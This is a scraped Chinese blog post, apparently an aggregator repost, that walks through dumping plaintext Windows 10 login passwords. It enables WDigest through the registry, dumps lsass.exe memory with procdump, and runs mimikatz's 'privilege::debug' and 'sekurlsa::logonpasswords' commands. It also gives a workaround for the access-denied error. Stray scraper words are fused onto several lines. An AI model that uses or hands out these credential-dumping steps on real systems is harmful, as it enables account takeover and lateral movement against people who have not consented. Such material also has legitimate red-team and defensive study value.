優雅的獲取win10密碼

時間  2019-11-15
標籤 優雅 獲取 win10 win 密碼 欄目 Windows 简体版
原文   原文鏈接

工具:
procdump & mimikatzwindows

實驗環境:
實驗主機:win10
帳戶密碼:17位複雜密碼(大小寫+特殊字符+數字)
(雖然微軟很早就更新了補丁來防止獲取windows的明文密碼,可是能夠修改註冊表...
使 \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest下的UseLogonCredentiald的鍵值爲1 即表明WDigest的密碼支持明文形式保存在LSA內存中)
優雅的獲取win10密碼sass

步驟:ide

使用cmd運行procdump.exe
輸入:Procdump.exe -accepteula -ma lsass.exe lsass.dmp工具

優雅的獲取win10密碼

使用cmd運行mimikatz.exe
優雅的獲取win10密碼ui

輸入:privilege::debug
sekurlsa::logonpasswordsurl

在wdigest:下顯示的就是管理員的密碼debug

補充:3d

若是按照網上的教程在mimikatz輸入指令這裏100%報錯
(ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005))blog

privilege::debug(提權)
sekurlsa::logonpasswords(抓密碼)教程

相關文章
相關標籤/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公眾號
   歡迎關注本站公眾號,獲取更多信息
聯繫我們 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程